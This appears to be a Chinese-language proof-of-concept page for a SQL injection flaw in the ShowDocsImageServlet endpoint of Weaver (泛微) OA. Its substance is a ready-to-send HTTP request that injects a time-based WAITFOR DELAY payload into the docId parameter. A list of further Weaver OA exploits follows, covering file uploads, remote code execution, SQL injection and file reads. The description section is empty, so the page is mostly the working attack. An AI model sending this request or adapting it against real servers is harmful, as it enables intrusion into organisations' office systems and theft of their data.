泛微OA ShowDocsImage SQL注入漏洞

漏洞描述

PoC代码

GET /weaver/weaver.docs.docs.ShowDocsImageServlet?docId=1%20WAITFOR%20DELAY%20'0%3a0%3a0' HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
Cookie: JSESSIONID=aaaXESw-8zhzlc-6bfm9y; ecology_JSessionid=aaaXESw-8zhzlc-6bfm9y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36

相关漏洞推荐

• 泛微OA /dwr/call/plaincall/ 权限绕过漏洞
• 泛微OA weaver.common.Ctrl 任意文件上传漏洞
• POC 泛微OA E-Cology Action.jsp mobile.skin.SkinAction 任意文件上传漏洞
• e-office-v10-officeserver-upload: 泛微OA E-Office OfficeServer.php 任意文件上传漏洞
• 泛微 OA E-Cology deleteUserRequestInfoByXml 文件读取漏洞（CVE-2023-2806）
• 泛微OA /weaver/weaver.file.FileDownloadForOutDoc SQL 注入漏洞
• POC CNVD-2019-32204: 泛微OA E-Cology BshServlet 远程代码执行漏洞
• POC CNVD-2021-33202: 泛微OA E-Cology LoginSSO.jsp SQL注入漏洞
• POC CNVD-2021-49104: 泛微OA E-Office UploadFile.php 任意文件上传漏洞
• POC CNVD-2023-12632: 泛微 OA e-cology v9 sql 注入
• POC ecology-e-office-mysql-config-leak: 泛微OA E-Office mysql_config.ini 数据库信息泄漏
• POC e-bridge-saveyzjfile-file-read: 泛微OA E-Bridge saveYZJFile 任意文件读取
• POC ecology-arbitrary-file-upload: 泛微OA e-cology V9前台任意上传漏洞